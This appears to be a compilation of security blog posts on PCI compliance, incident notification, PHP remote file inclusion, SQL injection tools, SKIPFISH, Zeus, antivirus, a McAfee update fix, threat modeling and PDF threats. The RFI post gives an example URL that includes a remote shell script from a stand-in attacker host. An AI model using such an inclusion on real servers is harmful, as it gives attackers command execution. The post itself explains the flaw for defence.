The Media Makes PCI Compliance “Best Defense”?

I have seen a lot of hype in my day, but this one is pretty much — not funny. Below is a link to a mainstream media trade magazine for the hospitality industry in which the claim that PCI compliance is the “best defense” hotels and the like can have against attackers and data theft.

Link: http://is.gd/cgoTz

Now, I agree that hospitality folks should be PCI complaint, since they meet the requirements by taking credit cards, but setting PCI DSS as the goal is horrible enough. Making PCI out to be the “best defense” is pretty ridiculous.

PCI DSS and other standards are called security BASELINES for a reason. That is, they are the base of a good security program. They are the MINIMUM set of practices deemed to be acceptable to protect information. However, there is, in most all cases, a severe gap between the minimum requirements for protecting data and what I would quantify as the “best defense”. There are so many gaps between PCI DSS as a baseline and “best defense” that it would take pages and pages to enumerate. As an initial stab, just consider these items from our 80/20 approach to infosec left out of PCI: Formalized risk assessment (unless you count the SAQ or the work of the QSA), data flow modeling for data other than credit card information, threat modeling, egress controls, awareness, incident response team formation and even skills gap/training for your security team.

My main problem with PCI is not the DSS itself, but how it is quickly becoming the goal for organizations instead of the starting line. When you set minimums and enforce them with a hammer, they quickly come to be viewed as the be-all, end-all of the process and the point at which the pain goes away so you can focus on other things. This is a very dangerous position, indeed. Partial security is very costly and, at least in my opinion, doing the minimum is pretty far away from being the “best defense”.

Responding to a Compromised System Alert

Thanks to the data from the HITME, I interact with a lot of people and organizations that have compromised machines. Often, my email or phone call is the first they have heard of the problem. Reactions vary from shock and denial to acceptance and occasionally rage. Even worse, when they hear that their machines are attacking others or being used in active attacks, many have no idea how to handle the situation.

Should you ever get a call like this from me or someone else, here are a few tips that you might find helpful for proceeding.

1. Be polite. I am calling to help you. Even though my message may mean more work and possibly some pain for you and your staff, knowing about a compromise is MUCH better than not knowing. Usually, the more polite and nice you are, the more information I will help you understand. I can usually point you in the right direction to begin to understand the issue, but if you act like a jerk, I will likely leave you to it.

2. Begin an investigation as soon as possible. Invoke your incident response process. If you don’t have one, ask for help, or retain assistance. But, please, treat a caller who explains and demonstrates that you have a system compromise with immediate attention. I see hundreds of compromised systems a day and I don’t have time to beg and plead with you to reduce your risk and the risk your systems present to others. I am happy to substantiate my claims, but after I notify you, TAKE ACTION. The majority of compromised systems involved in notification remain under attacker control for extended periods. Often, weeks and months pass by before any apparent action (such as mitigation or clean up) takes place.

3. Do a thorough job of mitigation. I would say that more than 25% of the time (I just started formally tracking this to gather better metrics.) when a site goes through “clean up”, they end up compromised again and right back where they started from. Likely many of these machines are simply bot-infected and the bots just place their malware back on the system after “clean up” is done. Removing the basic tag files or malware, but not understanding how they got there in the first place and fixing that is pretty much meaningless. For example, I have been working with a site presently that has been used as a PHP RFI verification tag file host for weeks. They have “cleaned up” every day for several weeks to no avail. Every night, they get hit by another PHP RFI scanner and it exploits their system and drops a new tag or malware bot. I have tried explaining no less than 10 times how they need to identify the underlying PHP issue, harden the PHP environment (yeah, I sent them the settings) to no avail. This is an example of how to fail at risk, threat and vulnerability management. Don’t do it. Fix the real problems. If you don’t know how, ask and then follow the guidance provided. If you need more help, either retain it or get a scanner and start hardening.

4. Respect the law. Don’t beg me not to turn this over to law enforcement. I have to. I want to, if you are critical infrastructure or some other member of the high threat club. Fix your stuff and manage security appropriately if you’re a member of the club; or you deserve to explain to law enforcement why you declined. Either way, I am going to try and help you and everyone by making the report.

5. List a contact for security issues on your site. Please, when I do call, I need to know who to talk to. At the very least, let your reception folks know how to handle security calls. The last thing you want is for the attacker to continue to compromise your systems while I play in “Voicemail-Land” forever. Remember, help me help you.

Lastly, even if you don’t get this call, do your due diligence. Make sure that your systems are secure and that you have security processes in place. Retain someone to help you manage risk and perform validation. Work with them to create effective risk management techniques for your organization. Hopefully, you won’t be on the other end of the line tomorrow or the next day as I make my round of calls….

If you have any additional suggestions or comments on this approach, please feel free to drop a comment below. As always, thanks for reading and be careful out there.

Understanding PHP RFI Vulnerabilities

PHP is a scripting language that is deployed on countless web servers and used in many web frameworks. “PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML.”[1] In 2007, at least 20 million websites had PHP deployed. The exponential growth of PHP came from the development of LAMP/WAMP stacks. These stand for Linux/Apache/MySQL/PHP and Windows/Apache/MySQL/PHP respectively.

These ensure that deployment of PHP applications are simple enough for the most novice web developer. Many of you may have heard of WordPress, Drupal, or Joomla. These are common web applications that are written entirely in PHP. Many sites run PHP as their main scripting language, such as Youtube, Facebook, Digg, and Wikipedia.

PHP also powers cybercrime. A large majority of publicly disclosed vulnerabilities are PHP related. In 2009, 5733 PHP Remote File Inclusion vulnerabilities were disclosed.[2] In situations where exploiting PHP RFI is possible, most likely SQL Injection and Cross Site Scripting are all possible. This is due to the exploits having the same root cause or lacking input validation.

What is a PHP Remote File Injection (RFI) attack? A PHP RFI attack occurs when there is unvalidated input to a PHP script. This allows PHP code to be injected by a malicious person. For example, a typical PHP URL would look something like this:

www.example.com/errors.php?error=errorsfile.php.

How can this be abused to cause PHP RFI? The errors.php script is taking a file as input, which in the example, is errorsfile.php. If the site is vulnerable and does not have input validation, any file could be used as input, even files from remote servers. When the vulnerable server requests www.example.com/errors.php?error=http://evilhaxor.com/remoteshell.php, the remoteshell.php file will be processed by the web server. Attackers can do quite a bit with remotely included PHP files, including opening a shell, enumerating users or programs, and defacing the website. Basically, whatever user the web server is running as, an attacker can run commands as that user.

How do we fix PHP RFI? There are several variables within the PHP configuration that can be set to provide a more secure environment for PHP code to run in. These are register_globals, allow_url_fopen, and allow_url_include. In an ideal world, we would be able to set all of these variables in the php.ini file to OFF. However, in most cases this will break applications dependent on these functions. A thorough review of their usage should be done before setting any of them to OFF. Another solution is to implement secure coding practices in PHP, and to implement input validation.

Detailing input validation methods and ways to securely code PHP is too complex for this article. However you can discover more by reading the OWASP Top 10 entries for PHP RFI, and the Web Application Security Consortium article on PHP RFI. Both will help you learn about this threat and take precautions for your own network.

SQL Injection Tools in the Field

As the Internet continues to morph, common attack vectors change. Info Sec professionals once had the ease of scanning a network and leveraging available vulnerabilities to gain a foothold; but now we’re seeing a paradigm shift toward web applications and the security that protects them. I’m sure this is nothing new to our readers! We all see the application as an emerging favorite to gain access to the network; just as we’re seeing the web browser gaining popularity in targeting the end user and workstation.

As our Team continues to provide top notch application assessment services, we’re seeing SQL Injection (SQLi) as one major vector of which to take advantage. Unfortunately, this attack is quite time-consuming, considering the various ways developers code their queries, utilize the architecture involved, and evaluate how the application handles interactions with the database. In an effort to be more efficient in the quest for vulnerable query strings, we have aggressively tested the plethora of SQLi tools that have been publicly released. Initially, the Team hoped to evaluate these tools and provide an extensive review on the performance of each. This tech is sad to report that from the three tools tested recently, not one was successful in the endeavor.

After some discussion, the Team concluded there are simply too many variables in play for one tool to serve as “the silver bullet.” The language and structure of the queries are just a few of the challenges these tools face when sniffing out vulnerable SQL strings. With so many variables for attackers and penetration testers to overcome, SQL injection testing has become extremely difficult to automate reliably! That being said, it appears as if these tools are created for use in such specific circumstances that they’re rendered useless for anything but that one, specialized scenario. So we’re continuing to find this to be a long, drawn out, manual process. This is not a complaint. Our Team loves the challenge! It’s just difficult to find a SQLi tool that can adapt to uses other than that for which the tool was specifically created – commonly a source of frustration when trying to expedite the process and finding little success.

SKIPFISH Review

This week, our team had the opportunity to test Google’s recently released web application scanner known as SKIPFISH. Touted as an active reconnaissance tool, SKIPFISH claims to present an interactive site map for a targeted site by performing a myriad of recursive crawls and discretionary based probes. The map is then notated with the output of several active security checks which are designed to be non-disruptive. SKIPFISH isn’t a replacement for Nessus, Nikto, or any other vulnerability scanner which might own your allegiance. Instead, this tool hopes to supplement your current arsenal.

SKIPFISH boasts high performance- “500+ requests per second against responsive Internet targets, 2000+ requests per second on LAN / MAN networks, and 7000+ requests against local instances have been observed, with a very modest CPU, network, and memory footprint.” To that end, the test used for our evaluation saw a total of more than 9 million HTTP requests over 3 days using the default dictionary included with the tool. While this test was conducted, there was no interruption of the target site although response times did increase dramatically.

The scan’s result provides a huge directory of files that are fed into index.html. When called by the web browser, this report turns out to be easily readable and comes with pointy-clicky goodness, thanks to a plethora of JavaScript (so be sure you’re allowing it to be seen). The report lists each page that was interrogated during the scan and documents server responses (including errors and successful replies), identifies possible attack vectors (such as password entry fields to brute force), along with other useful tidbits for each. Following the breakdown by page, SKIPFISH provides a list of document types (html, js, PDF, images, and various text formats) and their URLs. The report closes with an overview of various issues discovered during the scan, complete with severity ratings and the URL of the finding.

All in all, this tool has potential. It’s certainly not going to replace any of the other tools in our Web Application Assessment toolkit, but it is a good supplement and will most likely be added to give more information going forward. It is very user friendly, despite the time it took to scan the target site with the default dictionary. This in itself tells our team more testing is necessary, not to mention the fact that there are several options that can enhance functionality of the tool. With the sheer number of exploits and attack vectors available in web applications today, it can never hurt to get a different look at the application using a number of tools. And in this tech’s opinion, redundancy is good in that it shows the stability of our findings across the board.

Zeus-bot Gets More Power

Symantec is reporting that the mighty Zeus bot network is getting more capability and powerful new features. Read a summary of their thoughts here.

Among the new features seems to be a focus on Windows 7 and Vista systems as opposed to XP. New mechanisms for random file and folder names in an attempt to evade basic detection tools looking for static names and paths are also observed.

Even worse for web users, the manipulation and information gathering techniques of the trojan have been refined and now extend more capability to tamper with data flows when the user is using the FireFox browser in addition to Internet Explorer.

Organizations should note that this trojan has a strong history of credential theft from social networks and other popular sites on the public Internet. Users who use the same credentials on these sites with infected machines can expose their work credentials to attackers. Security teams should step up their efforts to make users more aware of how to secure their home and portable systems, what is expected from them in terms of using unique authentication and other relevant security training.

It’s quite unlikely that the threat of Zeus and other malware like it is going to go away soon. Technical controls are lagging well behind in terms of prevention and detection for these threats. That means that education and helping users practice safer computing is likely to be one of the most powerful options we have to combat these threats.

A Quick Thought on Window’s Anti-Virus

I know that recently I’ve been spending a lot of time talking about Windows antivirus. Often, I am quite disappointed at the effectiveness of most antivirus tools. Many security researchers, and my own research on the subject, estimate antivirus to be effective less than half of the time. That said, I still believe that antivirus deserves a place on all systems and I wanted to take a moment to describe the way that I implement antivirus on many of the Windows machines in my life.

Let me start by saying first, that I have very few Windows machines left in my life. Most of those machines that I still use on a day-to-day basis are virtual machines used for very specific research and testing purposes. I use a pretty basic approach for antivirus on these systems, as they are not usually exposed to general use, uncontrolled traffic or un-trusted networks.

However, there are still a few holdout machines that I either use or support for friends and family. On these devices, most of which are Windows, I have begun to use a new approach for antivirus implementation. Thus far, I have been impressed by the solution and the effectiveness of keeping the machines relatively virus free and operating smoothly. So, how do I do it? Well, for starters, I use two different antivirus products. First, I install Clam AV for Windows and configure it for real-time protection. Clam is free software and so far I have been very impressed with its performance. One of the nicest things about the clam solution is that it has a fairly light system footprint and doesn’t seem to bog down the system even while it performs real-time protection. Next, I install the Comodo firewall and antivirus solution. This solution is pretty nice. It includes, not only antivirus, but also a pretty effective and useful firewall. This software is also free for noncommercial use. On the Comodo antivirus, I remove real-time protection and instead, schedule a full antivirus scan every night while my family member is sleeping.

By combining two different antivirus products, one in real time and the other for periodic ongoing scanning, I seem to have been able to reduce my service call infection rates by about 50%. From an attacker standpoint, a piece of malware would need to be able to evade both products in order to maintain a presence on the system longer than 24 hours. While such an attack is surely plausible, it simply is not the threat pattern that my family’s home personal use machines face. By combining two different products and leveraging each of them in a slightly different way, I have been able to increase the effective defense for my users.

As always, your mileage and paranoia may vary. Certainly, I am not endorsing either of these products. You should choose whatever antivirus products you feel most comfortable with. I simply used these examples as free solutions in a way to illustrate this approach. Thanks for reading, and be careful out there.

McAfee Update Causing System Problems

McAfee’s Anti-Virus update for today (5958 DAT April 21, 2010) is causing systems to be stuck in an infinite reboot cycle. If your systems have not updated yet, it is highly recommended to prevent them from doing so, disable automatic updates and any pending update tasks.

The issue comes from the update detecting a false positive on systems. It appears that only Windows XP SP3 systems are effected. McAfee detects this false positive in the file C:/WINDOWS/system32/svchost.exe and thinks it contains the W32/Wecorl.a Virus. The machine then enters a reboot cycle.

McAfee has released a temporary fix to suppress the false positive. To use the fix with VirusScan Enterprise Console 8.5i or higher, Access Protection must be first disabled by following this knowledge base article here. (Alternate Google cache page, site is very busy here.)

To correct a machine with this issue, follow these steps:

1. Download the EXTRA.DAT file here. (Or from the KB article)
2. Start the effected machine in Safe Mode
3. Copy the EXTRA.DAT file to the following location:
\Program Files\Common Files\McAfee\Engine
4. Remove svchost.exe from the quarantine.

The 80/20 Rule of #Security: Threat Modeling

Threat modeling is a powerful technique that helps characterize higher level threats and separates them into more manageable sub-threats that can be addressed. Threat modeling can help an organization discover the core issue that lies beneath a high level threat, such as a denial of service (DoS).

There are different approaches toward threat modeling. One is to examine an existing application. The other is to evaluate a threat during every stage of the software development lifecycle (SDLC). With our 80/20 Rule of Information Security” project list, we tackle what regulations apply to your company and assess the risks.

For instance, let’s say a regulation requires strong access control measures to be in place. A high-level threat would be when a malicious user escalates privileges. In order to do this, the user would need to bypass the authentication process. With a Risk Management Threat Modeling Project, MSI would analyze the applications to find alternate entry points in order to harden them and ensure that only authorized users have access.

What is important is discovering where threats exist and then developing security solutions to address them. MSI also examines data flow diagrams that charts the system. Once we see the data flows, we can then start looking for vulnerabilities.

We use the STRIDE approach, which stands for: Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, and Elevation of Privilege. With each phase, we carefully examine all of the loopholes that could leave your company’s data exposed. For instance, “spoofing” is pretending to be something you’re not. Many attackers use email to send notices to individuals that may look as though it was coming from a reputable source (like PayPal) but a quick look at the link address would prove otherwise. These attacks now have a name: phishing.

No business wants a Denial of Service. This happens when an attack overloads your server with fake requests so that it crashes the system. MSI’s HoneyPoint Security Server is an excellent way to prevent such attacks from happening.

Tampering attacks can be directed against static data files or network packets. Most developers don’t think about tampering attacks. When reading an XML configuration file, for example, do you carefully check for valid input? Would your program behave badly if that configuration file contained malformed data? These are some of the questions to consider when analyzing for risk.

MSI can help you achieve a more secure posture. Why not give us a call today?

Pain and Malicious PDFs

The ubiquitous PDF, it just seems to be everywhere. With all of the recent hype surrounding a variety of exploits that have come to light in the last couple of weeks, many of our customers are asking about how to defend against malicious PDF documents. This is both a simple and a complex question.

The simple answer, and of course the least realistic, is to disallow PDFs altogether. However, as you might already suspect, this is nearly impossible in any modern enterprise. A couple of recent polls in customer enterprises showed that even when staff members said they didn’t use PDFs for anything in their day-to-day work, nearly all of them realized suddenly that PDFs were an important part of some process once PDF documents started to get blocked at the perimeter. Not one single organization that is a client has reported success at blocking PDF documents as a blanket solution.

So, if we can’t block something that may be dangerous, then we are back to that age old game of defense in depth. We’re going to need more than one single control to protect our organization against this attack vector. Sure, almost everyone has antivirus on their workstations and other systems, however, in this case, most antivirus applications show little progress in detecting many malicious PDF attack vectors. But, the good news is, that antivirus is as effective as usual at detecting the second stage of a malicious PDF attack, which usually involves the installation of malware. Some organizations have also started to deploy PDF specific heuristic-based solutions in their email scanners, web content scanners, firewalls and IDS/IPS systems. While these technical controls each have varying levels of strengths and weaknesses, when meshed together they do a pretty good job of giving you some detective and maybe preventative capability for specific known attack vectors using PDFs.

Obviously, you want to back up these technical controls with some additional human training, education and awareness. You want users to understand that a PDF can be as dangerous, if not more so, than many other common attachments. Many of the users we have talked to in the last few weeks have been surprised by the fact that PDFs could execute remote code or be harmful. It seems that many users trust PDF documents a lot more than they should. Given how many of the new PDF exploits work, it is a good idea to make your users aware they they should pay careful attention to any pop-up messages in the PDF reader and that if they are unsure about a message they should seek assistance before accepting or hitting OK/Continue.

Lastly, PDF attacks like the current ones in circulation, continue to show the importance of many of the projects in our 80/20 Rule of Information Security. By leveraging projects such as anomaly detection and enclave computing, organizations can not only reduce the damage that a successful client side attack can do, but they can give themselves a leg up on identifying them, blocking their sources and quarantining their victims. If you would like to discuss some of these approaches, please drop me a line or give us a call.

What approaches to PDF security has your organization found to be effective? If you have a winning strategy or tactic, leave us a comment below. As always, thanks for reading and be careful out there.